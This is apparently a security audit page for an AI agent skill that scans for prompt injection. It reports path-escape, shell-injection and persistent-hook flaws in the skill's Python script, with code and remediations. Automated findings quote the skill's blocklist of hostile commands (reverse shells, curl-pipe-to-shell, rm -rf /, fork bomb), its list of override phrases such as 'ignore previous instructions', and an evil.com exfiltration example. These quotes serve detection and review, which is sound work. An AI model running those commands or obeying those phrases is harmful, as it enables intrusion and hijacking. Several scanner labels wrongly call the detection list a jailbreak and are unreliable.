Back to skill

Security audit

Openclaw Bastion

Security checks for vulnerabilities and agentic risk

Overview

This skill has a coherent security purpose, but it gives itself broad file-changing and persistent hook behavior with unsafe scoping and restoration logic.

Install only after reviewing the script behavior and avoid enabling the generated hooks as-is. Use read-only scan/check/status commands first, do not run quarantine/unquarantine on paths outside the intended workspace, and be cautious scanning secret-bearing files because matched text can be printed to the console.

Vulnerability Patterns
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Unauthorized Access and Privilege EscalationObtains permissions beyond the task's legitimate needs
  • System PersistenceInstalls backdoors, hooks, services, or scheduled tasks that survive the run
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
Findings (6)

T05 · Unauthorized Access and Privilege Escalation

Error
Location
scripts/bastion.py:1218
Finding
Workspace confinement bypass permits moving arbitrary accessible files<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1218-1254` **Vulnerability Type**: Unrestricted path handling and unauthorized file relocation **Risk Level**: High ### Technical Analysis The `quarantine` command accepts an absolute path without requiring it to be located under the configured workspace. Failure of `relative_to(workspace)` merely changes the displayed name; it does not reject the path. The command also moves the target even when the scanner finds no injection patterns. Therefore, any regular file accessible to the Bastion process can be removed from its original location and moved into the workspace quarantine directory. ```python def cmd_quarantine(workspace: Path, filepath: str): """ Move a file with injection patterns to .quarantine/bastion/ with evidence metadata. """ target_path = Path(filepath) if not target_path.is_absolute(): target_path = workspace / target_path if not target_path.is_file(): print(f"ERROR: File not found: {filepath}", file=sys.stderr) return 2 try: rel = target_path.relative_to(workspace).as_posix() except ValueError: rel = target_path.name # Scan for evidence findings = scan_file(target_path, rel) risk = compute_file_risk(findings) # Prepare quarantine destination q_dir = ensure_quarantine_dir(workspace) safe_name = rel.replace("/", "__").replace("\\", "__") q_file = q_dir / safe_name q_meta = q_dir / (safe_name + ".meta.json") # Handle name collision counter = 1 while q_file.exists(): q_file = q_dir / f"{safe_name}.{counter}" q_meta = q_dir / f"{safe_name}.{counter}.meta.json" counter += 1 # Move the file shutil.move(str(target_path), str(q_file)) ``` This violates least privilege for a workspace content scanner. The same unrestricted absolute-target pattern is also present in `cmd_block`, while `collect_scannable_files` permits expli ...[truncated 1165 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Resolve both paths before use and require the target to remain within the resolved workspace: ```python workspace_real = workspace.resolve(strict=True) target_real = target_path.resolve(strict=True) try: target_real.relative_to(workspace_real) except ValueError: raise ValueError("Target must be inside the configured workspace") ``` - Reject symlinks or verify their resolved destinations before reading or modifying them. - Apply the same confinement helper to `block`, `sanitize`, `quarantine`, `canary`, `check`, and explicit scan targets. - Refuse quarantine unless findings contain at least one eligible critical pattern. - Require explicit confirmation before moving files, with a separate `--force` option for automation. - Run modifying operations under a restricted account with access limited to the workspace. - Add regression tests for absolute paths, `..` traversal, symlink escapes, and clean files. ]]>

T05 · Unauthorized Access and Privilege Escalation

Error
Location
scripts/bastion.py:1329
Finding
Tamperable quarantine metadata permits restoration to arbitrary filesystem paths<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1329-1347` **Vulnerability Type**: Untrusted metadata controls an unrestricted write destination **Risk Level**: High ### Technical Analysis The unquarantine operation trusts `original_abs_path` from a JSON file stored inside the workspace. It does not verify that the resulting destination remains under the workspace and does not refuse to overwrite an existing destination. ```python if q_meta.is_file(): try: with open(q_meta, "r", encoding="utf-8") as f: meta = json.load(f) original_path = meta.get("original_abs_path") or meta.get("original_path") except (json.JSONDecodeError, OSError): pass if original_path is None: # Reconstruct from safe name original_path = str(workspace / safe_name.replace("__", "/")) dest = Path(original_path) if not dest.is_absolute(): dest = workspace / dest # Ensure parent directory exists dest.parent.mkdir(parents=True, exist_ok=True) # Move back shutil.move(str(q_file), str(dest)) ``` Because `.quarantine/bastion/*.meta.json` is ordinary workspace state with no integrity protection, an attacker capable of modifying workspace content can set `original_abs_path` to any location writable by the Bastion process. `shutil.move` may replace an existing file depending on platform and destination semantics. ### Attack Path 1. An attacker places a payload in `.quarantine/bastion/item`. 2. The attacker creates or modifies `.quarantine/bastion/item.meta.json`. 3. The metadata sets `original_abs_path` to an out-of-workspace destination such as a user configuration or executable script. 4. The attacker convinces the agent or operator to run `bastion.py unquarantine item`. 5. Bastion creates destination parent directories when necessary and moves the payload to the attacker-selected path. 6. If the selected file is later loaded or executed, the ...[truncated 602 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Never trust an absolute restoration path from editable metadata. - Store only normalized workspace-relative paths. - Resolve the destination and enforce that it is a descendant of the configured workspace. - Authenticate quarantine metadata with a key stored outside attacker-writable workspace state, or derive restoration destinations from an internal database with restrictive permissions. - Refuse to restore onto an existing file unless the operator explicitly approves it. - Open destination files using no-follow and exclusive-creation semantics where supported. - Validate that both the quarantine file and metadata are regular files and not symlinks. - Remove the lossy `safe_name.replace("__", "/")` reconstruction and use an unambiguous, validated path representation. ]]>

T06 · System Persistence

Error
Location
scripts/bastion.py:1461
Finding
Generated hook commands are vulnerable to shell-command injection<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1461-1504` **Vulnerability Type**: Command injection in generated persistent hook configuration **Risk Level**: High ### Technical Analysis The `enforce` command interpolates `script_path` and the user-selected `workspace` directly into shell command strings. Double quotes are added, but embedded quotes, command substitutions, backticks, newlines, and shell metacharacters are not escaped. ```python def cmd_enforce(workspace: Path): """ Generate a Claude Code hook configuration that runs bastion scan on file reads (PreToolUse hook for Read tool). Outputs the JSON config to add to settings. """ # Determine the path to this script script_path = Path(__file__).resolve() hook_config = { "hooks": { "PreToolUse": [ { "matcher": "Read", "hooks": [ { "type": "command", "command": f"python3 \"{script_path}\" check \"$TOOL_INPUT_FILE\" --workspace \"{workspace}\"", "timeout": 15, "description": "Bastion Pro: scan file for injection patterns before reading" } ] }, { "matcher": "Bash", "hooks": [ { "type": "command", "command": f"python3 \"{script_path}\" check-command \"$TOOL_INPUT_COMMAND\" --workspace \"{workspace}\"", "timeout": 10, "description": "Bastion Pro: validate command against policy before execution" } ] } ], "SessionStart": [ { "hooks": [ { ...[truncated 1917 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Avoid shell command strings. Generate hooks using an argument-array format if the hook system supports it. - If a shell string is unavoidable, quote every static path with `shlex.quote` on POSIX and use a platform-appropriate quoting implementation on Windows. - Pass dynamic tool input through environment variables without interpolating it into a shell command. - Reject control characters and newlines in paths used in generated configuration. - Do not instruct users to install generated hooks until the exact serialized configuration has been validated. - Prefer a fixed, trusted launcher in a path controlled by the user rather than embedding the skill's current location. - Add tests using paths containing spaces, `"`, `'`, `$()`, backticks, semicolons, ampersands, and newlines. ]]>

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/bastion.py:1485
Finding
Generated Bash enforcement hook invokes a nonexistent command<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1485-1494` **Vulnerability Type**: Fail-closed denial of service and absent command-policy enforcement **Risk Level**: Medium ### Technical Analysis The generated Bash `PreToolUse` hook invokes a `check-command` subcommand: ```python { "matcher": "Bash", "hooks": [ { "type": "command", "command": f"python3 \"{script_path}\" check-command \"$TOOL_INPUT_COMMAND\" --workspace \"{workspace}\"", "timeout": 10, "description": "Bastion Pro: validate command against policy before execution" } ] } ``` However, `build_parser()` defines `scan`, `check`, `boundaries`, `allowlist`, `status`, `block`, `sanitize`, `quarantine`, `unquarantine`, `canary`, `enforce`, and `protect`; it does not define `check-command`. The main dispatch function likewise has no handler for it. Consequently, every Bash hook invocation is expected to terminate with an argument-parsing error rather than evaluating the command against the policy. If nonzero hook status blocks the underlying operation as the documentation states, all Bash operations are denied. If the hook framework ignores the failure, command policy enforcement is silently absent. ### Attack Path 1. The operator runs `bastion.py enforce`. 2. The operator copies the generated configuration into Claude Code settings, following the printed instructions. 3. Any subsequent Bash tool request triggers the `check-command` hook. 4. Argument parsing rejects `check-command` as an invalid subcommand. 5. The requested Bash operation is blocked or proceeds without the advertised security validation, depending on host hook-failure semantics. An attacker can exploit the availability aspect by persuading a user to install t ...[truncated 439 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Implement and register `check-command` before generating any hook that references it. - Make command validation fail safely with clear diagnostics and test the actual hook exit-code contract. - Add an integration test that generates the configuration and executes every referenced command. - Validate policy semantics using parsed command arguments rather than fragile wildcard strings. - Version the generated hook schema and refuse installation when required handlers are unavailable. - Remove claims of runtime command enforcement until the implementation is complete and tested. ]]>

T01 · Skill Instruction Hijacking

Warning
Location
scripts/bastion.py:1112
Finding
“Blocked” prompt injections remain intact inside HTML comments<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1112-1126` **Vulnerability Type**: Ineffective prompt-injection neutralization and persistent file modification **Risk Level**: Medium ### Technical Analysis The `block` operation claims to neutralize prompt injection, but it retains the exact matched instruction and merely surrounds it with HTML comments: ```python # Apply blocks in reverse order to preserve positions modified = text blocked_count = 0 for start, end, desc in reversed(deduped): original_text = modified[start:end] blocked = ( f"<!-- [BLOCKED by openclaw-bastion] {desc} -->" f"{original_text}" f"<!-- [/BLOCKED] -->" ) modified = modified[:start] + blocked + modified[end:] blocked_count += 1 write_file_text(target_path, modified) ``` HTML comments are display-level markup, not a security boundary for language-model input. Agents commonly receive raw Markdown source, including comments. The original hostile text therefore remains in the content presented to the model and may still influence it. The scanner also does not exclude HTML comments. A later protection sweep can rediscover the retained text and wrap it again, creating repeated backups and nested markers while never removing the injection. This is especially sensitive because the automated `protect` flow applies `cmd_block` to agent instruction files. ### Attack Path 1. An attacker places a recognized injection phrase in an agent instruction file. 2. The operator runs `block`, or an installed session-start `protect` hook invokes it automatically. 3. Bastion surrounds the hostile text with HTML comments but leaves the instruction unchanged. 4. The agent reads the raw instruction file and still receives the hostile phrase. 5. A later scan detects the same phrase again, potentially causing repeated wrapping and backup creation. 6. The operator may incorrectly trust the ...[truncated 522 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Remove or replace hostile text rather than preserving it in comments. - Store the original content only in a separate quarantine record that is never supplied to the agent. - For instruction files, require human review and write a minimal placeholder stating that content was removed. - Re-scan modified content and require it to produce no equivalent critical findings before reporting success. - Make modifications atomic and retain a bounded, access-controlled backup history. - Do not automatically rewrite high-value instruction files during session startup. - Treat comments, hidden elements, and other presentation-only constructs as active input when the consumer is a language model. ]]>

T06 · System Persistence

Warning
Location
scripts/bastion.py:1497
Finding
Session-start protection hook automatically rewrites and quarantines workspace content<![CDATA[ ## Vulnerability Details **File Location**: `scripts/bastion.py:1497-1504` **Vulnerability Type**: Persistent destructive automation based on heuristic matches **Risk Level**: Medium ### Technical Analysis The generated configuration installs a session-start hook that invokes the full `protect` operation: ```python "SessionStart": [ { "hooks": [ { "type": "command", "command": f"python3 \"{script_path}\" protect --workspace \"{workspace}\"", "timeout": 60, "description": "Bastion Pro: full protection sweep on session start" } ] } ] ``` `protect` is not read-only. It removes Unicode formatting characters, creates backups, moves files classified as critical into quarantine, wraps matches in instruction files, and appends canary comments to agent instruction files. These decisions are based on regular-expression heuristics that can match legitimate prose or source code outside recognized Markdown fences. Running these operations automatically at every session start gives a scanner broad write and relocation authority over the workspace without per-file confirmation. This exceeds the minimum privileges required for the README and `SKILL.md` scanning, boundary-analysis, allowlist, and status functionality. ### Attack Path 1. A user installs the generated session-start hook. 2. An attacker or ordinary project file introduces text that matches a critical regular expression, potentially in legitimate non-fenced content. 3. At the next session start, `protect` scans the workspace automatically. 4. Non-instruction files classified as critical are moved to `.quarantine/bastion`. 5. Instruction files are rewritten using the ineffective HTML-comment blocking operation. 6. Canary comments are appended to sel ...[truncated 493 chars]
Remediation
<![CDATA[ ## Remediation Suggestions - Make session-start behavior read-only by default. - Separate `scan` from destructive remediation and require explicit operator approval for every modification or quarantine action. - Do not append canaries to agent identity, instruction, or memory files automatically. - Produce a remediation plan or patch preview instead of directly rewriting files. - Add configuration options for allowed roots, file types, maximum file count, and maximum total modified bytes. - Use atomic moves and maintain a reliable restoration manifest. - Clearly distinguish heuristic findings from confirmed malicious content. - Require an explicit opt-in flag for automated remediation and document all persistent side effects in `README.md` and `SKILL.md`. ]]>
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
Findings (50)

YARA rule 'reverse_shell': Reverse shell patterns in scripts or source code [malware]

Critical
Category
YARA Match
Content
"blocklist_patterns": [
        "curl *| *sh", "curl *| *bash",
        "wget *| *sh", "wget *| *bash",
        "wget -O- *| *sh",
        "rm -rf /", "rm -rf /*",
        ":(){ :|:& };:",
        "mkfs.*",
        "dd if=/dev/zero of=/dev/*",
        "dd if=/dev/random of=/dev/*",
        "> /dev/sda",
        "chmod 777 /",
        "eval $(curl *)",
        "python -c * urllib *",
        "nc -e /bin/sh *",
        "bash -i >& /dev/tcp/*",
    ],
    "notes": "Edit this file to customize. Bastion Pro enforces at runtime via hooks.",
}

# ---------------------------------------------------------------------------
# Utility functions
# ---------------------------------------------------------------------------

def now_iso() -> str:
    return datetime.now(timezone.utc).isoformat()


def resolve_workspace(workspace_arg: str = None) -> Path:
    """Determine workspace path from arg, env, or defaults."""
    ws = workspace_arg

    if ws is None:
        ws = os.environ.get("OPENCLA
Confidence
85% confidence
Finding
YARA rule matched a known malware signature (reverse shell, backdoor, ransomware, C2 framework, or info stealer).

Anti-Refusal Statement

High
Category
Anti-Refusal
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
Skill attempts to nullify the agent's safety policies or restrictions ('you have no restrictions', 'ignore your guidelines', 'do anything now'). This is a direct jailbreak that disables guardrails.

Anti-Refusal Statement

High
Category
Anti-Refusal
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
Skill attempts to nullify the agent's safety policies or restrictions ('you have no restrictions', 'ignore your guidelines', 'do anything now'). This is a direct jailbreak that disables guardrails.

Anti-Refusal Statement

High
Category
Anti-Refusal
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
Skill attempts to nullify the agent's safety policies or restrictions ('you have no restrictions', 'ignore your guidelines', 'do anything now'). This is a direct jailbreak that disables guardrails.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
80% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
80% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
90% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
80% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
80% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

Instruction Override

High
Category
Prompt Injection
Content
### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
Confidence
80% confidence
Finding
This pattern attempts to override system instructions or ignore safety constraints. Without LLM analysis, manual review is recommended.

YARA rule 'agent_skill_prompt_injection_hidden_instructions': Prompt injection or hidden instructions embedded in AI agent skill text [agent_skills]

High
Category
YARA Match
Content
3 scripts/bastion.py boundaries

# View command allowlist/blocklist
python3 scripts/bastion.py allowlist

# Quick posture summary
python3 scripts/bastion.py status
```

All commands accept `--workspace /path/to/workspace`. If omitted, auto-detects from `$OPENCLAW_WORKSPACE`, current directory, or `~/.openclaw/workspace`.

## What It Detects

### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
- **HTML injection** — `<script>`, `<iframe>`, `<img on
Confidence
80% confidence
Finding
YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

YARA rule 'agent_skill_prompt_injection_hidden_instructions': Prompt injection or hidden instructions embedded in AI agent skill text [agent_skills]

High
Category
YARA Match
Content
3 scripts/bastion.py boundaries

# View command allowlist/blocklist
python3 scripts/bastion.py allowlist

# Quick posture summary
python3 scripts/bastion.py status
```

All commands accept `--workspace /path/to/workspace`. If omitted, auto-detects from `$OPENCLAW_WORKSPACE`, current directory, or `~/.openclaw/workspace`.

## What It Detects

### Injection Patterns

- **Instruction override** — "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
- **System prompt markers** — `<system>`, `[SYSTEM]`, `<<SYS>>`, `<|im_start|>system`, `[INST]`, `### System:`
- **Hidden instructions** — Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
- **Markdown exfiltration** — Image tags with encoded data in URLs (`![](http://evil.com?data=BASE64)`)
- **HTML injection** — `<script>`, `<iframe>`, `<img on
Confidence
80% confidence
Finding
YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

External Script Fetching

High
Category
Supply Chain
Content
- **Unicode tricks** — Zero-width characters, RTL overrides, invisible formatting
- **Homoglyph substitution** — Cyrillic/Latin lookalikes mixed into ASCII text
- **Delimiter confusion** — Fake markdown code block boundaries to escape context
- **Dangerous commands** — `curl | bash`, `wget | sh`, `rm -rf /`, fork bombs

### Boundary Analysis
Confidence
90% confidence
Finding
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

External Script Fetching

High
Category
Supply Chain
Content
- **Unicode tricks** — Zero-width characters, RTL overrides, invisible formatting
- **Homoglyph substitution** — Cyrillic/Latin lookalikes mixed into ASCII text
- **Delimiter confusion** — Fake markdown code block boundaries to escape context
- **Dangerous commands** — `curl | bash`, `wget | sh`, `rm -rf /`, fork bombs

### Boundary Analysis
Confidence
90% confidence
Finding
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Tool Parameter Abuse

High
Category
Tool Misuse
Content
- **Unicode tricks** — Zero-width characters, RTL overrides, invisible formatting
- **Homoglyph substitution** — Cyrillic/Latin lookalikes mixed into ASCII text
- **Delimiter confusion** — Fake markdown code block boundaries to escape context
- **Dangerous commands** — `curl | bash`, `wget | sh`, `rm -rf /`, fork bombs

### Boundary Analysis
Confidence
85% confidence
Finding
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Tool Parameter Abuse

High
Category
Tool Misuse
Content
- **Unicode tricks** — Zero-width characters, RTL overrides, invisible formatting
- **Homoglyph substitution** — Cyrillic/Latin lookalikes mixed into ASCII text
- **Delimiter confusion** — Fake markdown code block boundaries to escape context
- **Dangerous commands** — `curl | bash`, `wget | sh`, `rm -rf /`, fork bombs

### Boundary Analysis
Confidence
85% confidence
Finding
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Tool Parameter Abuse

High
Category
Tool Misuse
Content
Bastion maintains a `.bastion-policy.json` in the workspace root with:

- **Allowlist**: Standard safe commands (git, python, node, npm, etc.)
- **Blocklist**: Dangerous patterns (curl pipe to shell, rm -rf /, fork bombs, etc.)

Run `allowlist` to create the default policy and view it. Edit the JSON file directly to customize.
Confidence
85% confidence
Finding
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

Tool Parameter Abuse

High
Category
Tool Misuse
Content
Bastion maintains a `.bastion-policy.json` in the workspace root with:

- **Allowlist**: Standard safe commands (git, python, node, npm, etc.)
- **Blocklist**: Dangerous patterns (curl pipe to shell, rm -rf /, fork bombs, etc.)

Run `allowlist` to create the default policy and view it. Edit the JSON file directly to customize.
Confidence
90% confidence
Finding
Tool parameters are crafted to achieve unintended or unsafe behavior. Parameter abuse can bypass intended safety checks (e.g. shell=True, --force, dangerous glob patterns).

YARA rule 'agent_skill_prompt_injection_hidden_instructions': Prompt injection or hidden instructions embedded in AI agent skill text [agent_skills]

High
Category
YARA Match
Content
This Matters

Agents process content from many sources: local files, API responses, web pages, user uploads. Any of these can contain prompt injection attacks — hidden instructions that manipulate agent behavior. Bastion scans this content before the agent acts on it.


## Commands

### Scan for Injections

Scan files or directories for prompt injection patterns. Detects instruction overrides, system prompt markers, hidden Unicode, markdown exfiltration, HTML injection, shell injection, encoded payloads, delimiter confusion, multi-turn manipulation, and dangerous commands.

If no target is specified, scans the entire workspace.

```bash
python3 {baseDir}/scripts/bastion.py scan
```

Scan a specific file or directory:

```bash
python3 {baseDir}/scripts/bastion.py scan path/to/file.md
python3 {baseDir}/scripts/bastion.py scan path/to/directory/
```

### Quick File Check

Fast single-file injection check. Same detection patterns as `scan`, targeted to one file.

```bash
python3 {baseDi
Confidence
80% confidence
Finding
YARA rule matched a hack tool or exploit indicator (offensive tools, reconnaissance, privilege escalation, or exploit frameworks).

External Script Fetching

High
Category
Supply Chain
Content
| **Hidden instructions** | Multi-turn manipulation ("in your next response, you must"), stealth patterns ("do not tell the user") | CRITICAL |
| **HTML injection** | `<script>`, `<iframe>`, `<img onerror=>`, hidden divs, `<svg onload=>` | CRITICAL |
| **Markdown exfiltration** | Image tags with encoded data in URLs | CRITICAL |
| **Dangerous commands** | `curl \| bash`, `wget \| sh`, `rm -rf /`, fork bombs | CRITICAL |
| **Unicode tricks** | Zero-width characters, RTL overrides, invisible formatting | WARNING |
| **Homoglyph substitution** | Cyrillic/Latin lookalikes mixed into ASCII text | WARNING |
| **Base64 payloads** | Large encoded blobs outside code blocks | WARNING |
Confidence
90% confidence
Finding
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

External Script Fetching

High
Category
Supply Chain
Content
| **Hidden instructions** | Multi-turn manipulation ("in your next response, you must"), stealth patterns ("do not tell the user") | CRITICAL |
| **HTML injection** | `<script>`, `<iframe>`, `<img onerror=>`, hidden divs, `<svg onload=>` | CRITICAL |
| **Markdown exfiltration** | Image tags with encoded data in URLs | CRITICAL |
| **Dangerous commands** | `curl \| bash`, `wget \| sh`, `rm -rf /`, fork bombs | CRITICAL |
| **Unicode tricks** | Zero-width characters, RTL overrides, invisible formatting | WARNING |
| **Homoglyph substitution** | Cyrillic/Latin lookalikes mixed into ASCII text | WARNING |
| **Base64 payloads** | Large encoded blobs outside code blocks | WARNING |
Confidence
90% confidence
Finding
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.

Credential Access

High
Category
Privilege Escalation
Content
SKIP_DIRS = {
    ".git", ".svn", ".hg", "__pycache__", "node_modules", ".venv", "venv",
    ".integrity", ".bastion", ".env", ".tox", "dist", "build", "egg-info",
    ".quarantine",
}
Confidence
60% confidence
Finding
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.

Credential Access

High
Category
Privilege Escalation
Content
".md", ".txt", ".json", ".yaml", ".yml", ".toml", ".ini", ".cfg",
    ".py", ".js", ".ts", ".jsx", ".tsx", ".html", ".htm", ".xml",
    ".csv", ".log", ".sh", ".bash", ".zsh", ".bat", ".cmd", ".ps1",
    ".env", ".conf", ".rst", ".tex", ".rb", ".go", ".rs", ".java",
    ".c", ".cpp", ".h", ".hpp", ".css", ".scss", ".less", ".sql",
    ".r", ".R", ".jl", ".lua", ".php", ".swift", ".kt", ".scala",
}
Confidence
83% confidence
Finding
Including '.env' in SCANNABLE_EXTENSIONS means the tool will read and scan dotenv files, which commonly contain secrets. In this skill's context, scanning content and printing matched excerpts can expose credentials in console output, logs, or metadata if a .env file contains suspicious-looking strings.

Static analysis

Detected: suspicious.prompt_injection_instructions

Prompt-injection style instruction pattern detected.

Warn
Code
suspicious.prompt_injection_instructions
Location
README.md:56